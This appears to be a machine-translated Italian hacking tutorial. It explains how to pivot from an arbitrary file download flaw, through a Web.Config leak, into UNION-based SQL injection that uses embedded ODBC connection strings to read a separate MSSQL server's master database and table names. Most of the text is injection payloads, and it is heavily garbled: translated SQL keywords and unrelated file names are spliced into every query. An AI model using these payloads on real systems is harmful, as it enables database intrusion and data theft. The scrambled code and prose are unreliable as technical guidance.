Primo punto, questo metodo è stato un molto tempo fa, ma probabilmente in testa con un tempo tranquillo per troppo tempo, già nello stato dimenticato. Grazie informazioni Trace. Spesso faccia arbitrario vulnerabilità scaricare file, il metodo generale di trattamento è quello di restituire la connessione al database file da scaricare, e poi la connessione remota.
Spesso faccia arbitrario vulnerabilità scaricare file, il metodo generale di trattamento è quello di restituire la connessione al database file da scaricare, poi la connessione remota. stato ideale di MSSQL, MYSQL e, in particolare nel database e il Web non è il caso di separazione, Backup SHELL, l'esportazione SHELL, possono essere utilizzati molti modi.
Ma se il database e separazione WEB, ma non possono accedere al database, comprese network, o altri mezzi per fare un firewall per cui non possiamo connettersi al database remote, potremmo supporre che alcuni dei re difficile, se non impossibile trovare un punto di MSSQL iniezione, in molti casi di solito impotente.
Qui per MSSQL come esempio, è successo di trovare un arbitrario vulnerabilità scaricare file, direttamente sotto la Web.Config tornare a vedere, inclusi database network discovery, per trovare una mezza giornata non ha trovato il punto di iniezione, nota poco marginale, è ci una stazione è un accesso peccato database. Indovina la tabella e viceversa. Tuttavia, la stazione di destinazione sfondo è noto, quindi preparati a leggere il punto di accesso degli account di destinazione administrator punto di iniezione. Alcuni intuitivo, dato direttamente sotto i miei risultati dei test locali:
Prendi un semplice punto, tre campi, ID, XM, XB, digitare il numero ID, seguito da due caratteri.
Supponiamo che ci sono lacune nel documento, l'attuazione di SQL conf selezionare bin backup di configurazione generate.sh eshow_sitemap.html dati di log maint tmp sitemap.html svn da whrere test id = 1
Ci sono tre campi, si usa l'indagine congiunta dell'Unione di far corrispondere ciò che è (operazione "black box" con l'ordine da campi o per determinare il numero di forza bruta)
SELECT conf bin backup dei dati di configurazione generate.sh eshow_sitemap.html log maint sitemap.html tmp test svn da dove id = 999.999 unione Select top 1 a 1,2, il nome da [ODBC Driver = SQL Server; UID = dbo; PWD = dba ;] master Server Database = =*****;. ku
Qui il database master ho creato una tabella di nome KU, sopra questa query, in quanto id = 999.999 non esiste, sotto l'azione dell 'inchiesta congiunta, i contenuti web il suo show originale il percorso della mostra l'accesso al database fuori della nostra struttura UNIONE risultati delle query, il nome del campo in una posizione di visualizzazione di caratteri.
campo del nome ku è il contenuto di questa tabella verrà essere visualizzato nel web su la posizione corrispondente, ma questo è chiaramente non quello che noi want, noi vogliamo l'intera struttura tabella and content
Per padroneggiare un esempio, ecco i risultati della simulazione, in anticipo so già la struttura del master, conveniente e il risultato sarà confrontato con il checksum è errato.
SELECT conf bin backup dei dati di configurazione generate.sh eshow_sitemap.html log maint sitemap.html tmp test svn da dove id = 999.999 unione Select top 1 a 1,2, da nome_tabella [ODBC Driver = SQL Server; UID = dbo; PWD = dba INFORMATION_SCHEMA.TABLES;] master =*****; DataBase Server =.
Questo database master name prima tabella è venuto fuori.
Mettiti al nome della tabella è semplice.
SELECT conf bin backup dei dati di configurazione generate.sh eshow_sitemap.html log maint sitemap.html tmp test svn da dove id = 999.999 unione Select top 1 a 1,2, da nome_tabella [ODBC Driver = SQL Server; UID = dbo; PWD = dba ;] master Server Database = =*****;. INFORMATION_SCHEMA.TABLES dove table_name non in (in alto selezionare 1 nome_tabella da [ODBC Driver = SQL Server; UID = dbo; PWD = dBA; Server =****; Database =] master. INFORMATION_SCHEMA.TABLES)
classe di razza inferiore a spingere metodo convenzionale per ottenere i nomi di campo e il contenuto dei campi del codice sotto la loro ingombrante propri.
Se il database in cui l'ID è un carattere, quindi
SELECT conf bin backup dei dati di configurazione generate.sh eshow_sitemap.html log maint sitemap.html tmp test svn da dove id = '999999 'union Select top 1 a 1,2, da nome_tabella [ODBC Driver = SQL Server; UID = dbo; PWD = dBA;] master Server Database = =***;. INFORMATION_SCHEMA.TABLES dove '1 '= '1'